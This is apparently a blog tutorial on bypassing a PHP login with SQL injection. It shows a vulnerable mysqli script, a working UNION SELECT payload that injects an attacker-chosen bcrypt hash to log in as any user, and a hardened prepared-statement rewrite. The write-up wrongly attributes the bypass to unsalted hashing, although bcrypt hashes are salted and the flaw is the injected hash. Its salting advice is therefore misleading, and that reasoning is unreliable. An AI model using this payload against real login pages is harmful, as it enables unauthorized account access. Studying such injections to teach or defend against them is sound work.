SQL Injection Bypass Login Password Protection

Bengsky
2 min read · Jul 28, 2023


Introduction:

In this write-up, we will explore a method to bypass login password protection using SQL injection. We will analyze a PHP-based login script that separates the username lookup (in the SQL query) from the password check (in PHP), which makes the traditional ' OR 1=1-- payload ineffective. Instead, we will employ an alternative approach to achieve the same result.

Objective:

The objective is to gain unauthorized access to a user’s account by exploiting a vulnerability in the login system.

The Login Script:

The login script shown below authenticates users against a database. It uses mysqli to establish a connection and runs a query that looks the user up by username only; password_verify then checks the submitted password against the hashed password stored in the returned row.

// Connection credentials. Note that $username and $password are reused
// below for the submitted form values, so the connection is opened first.
$conn = new mysqli($hostname, $username, $password, $database);
$username = $_POST['username'];
$password = $_POST['password'];

// Vulnerable: the submitted username is concatenated straight into the query.
$sql = "SELECT * FROM users WHERE username = '$username'";
$result = $conn->query($sql);

if ($result->num_rows == 1) {
    $row = $result->fetch_assoc();
    // The hash being compared against is whatever row the query returned.
    if (password_verify($password, $row['password'])) {
        session_start();
        $_SESSION['username'] = $username;
        header('Location: dashboard.php');
        exit; // stop processing after the redirect
    } else {
        echo "Invalid password. Please try again.";
    }
} else {
    echo "User not found. Please check your credentials.";
}

$conn->close();

Exploiting the Vulnerability:

Identifying Usernames:

The first step in bypassing the login is to identify a valid username.

We can use a SQL injection technique here because no salt is used in the password hashing, so we can supply a hash of our own choosing. Taking, for example, the hashed password $2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u for the password P@ssw0rd, we can craft the following SQL injection payload in the username field (where {username} is the account we want to log in as):

random string' UNION SELECT '{username}','$2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u' LIMIT 1 --

This will result in the following query execution:

SELECT * FROM users WHERE username = 'random string' UNION SELECT '{username}','$2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u' LIMIT 1 --

Since WHERE username = 'random string' matches no rows, the result set consists only of the UNION SELECT part, which supplies a single row containing the desired username and our hashed password, like so:

username|password
admin|$2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u

Because that row now holds our chosen username and hashed password, the script's password check reduces to the following call, which succeeds and grants unauthorized access to the target account:

if (password_verify('P@ssw0rd', '$2a$12$fW9ApWl1h67Wm/c.TxPdAenEQYdUVzk2ziAZD1jMTDpHRxqFDS49u'))

Conclusion

By exploiting the SQL injection vulnerability in the provided login script and carefully constructing the payload, we bypassed the login password protection and gained unauthorized access to the user's account. It is essential to address such security flaws promptly by implementing proper input validation, using prepared statements, and employing strong password hashing mechanisms with salts to protect against such attacks.
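To make the prepared-statement fix concrete, here is a hardened rewrite of the login script above. This is an added example, not code from the original post: it assumes the same users table with username and password columns, and renames the connection credentials to $dbUser and $dbPassword so they are not clobbered by the form values. The key point is that the bypass works because the attacker controls the hash that password_verify compares against; binding the username as a parameter removes that control, since the database never parses the submitted value as SQL.

```php
<?php
// Added example (not from the original post): hardened login script.
// Assumes a users table with columns username and password (bcrypt hash),
// and the connection variables $hostname, $dbUser, $dbPassword, $database.
declare(strict_types=1);

function authenticate(mysqli $conn, string $username, string $password): bool
{
    // Defence in depth: allowlist the username shape before it reaches the
    // database. The prepared statement below is the actual fix; this check
    // just rejects obviously malformed input early.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $username)) {
        return false;
    }

    // The username is bound as a parameter, so a value such as
    // "x' UNION SELECT ... --" is looked up literally as a username and
    // cannot add a row of the attacker's choosing to the result set.
    $stmt = $conn->prepare('SELECT password FROM users WHERE username = ? LIMIT 1');
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = $stmt->fetch();
    $stmt->close();

    if (!$found) {
        return false;
    }

    // The hash compared against now comes only from the stored row.
    return password_verify($password, (string) $storedHash);
}

$conn = new mysqli($hostname, $dbUser, $dbPassword, $database);

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';

if (authenticate($conn, $username, $password)) {
    session_start();
    session_regenerate_id(true); // new session id on login, against fixation
    $_SESSION['username'] = $username;
    header('Location: dashboard.php');
    exit;
}

// One generic message for both failure cases: separate "user not found" and
// "invalid password" responses tell an attacker which usernames exist.
echo 'Invalid username or password.';

$conn->close();
```

Storing hashes with password_hash(..., PASSWORD_DEFAULT) on registration pairs with this: each hash then carries its own salt, and the comparison in authenticate() only ever runs against a hash the application itself wrote.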
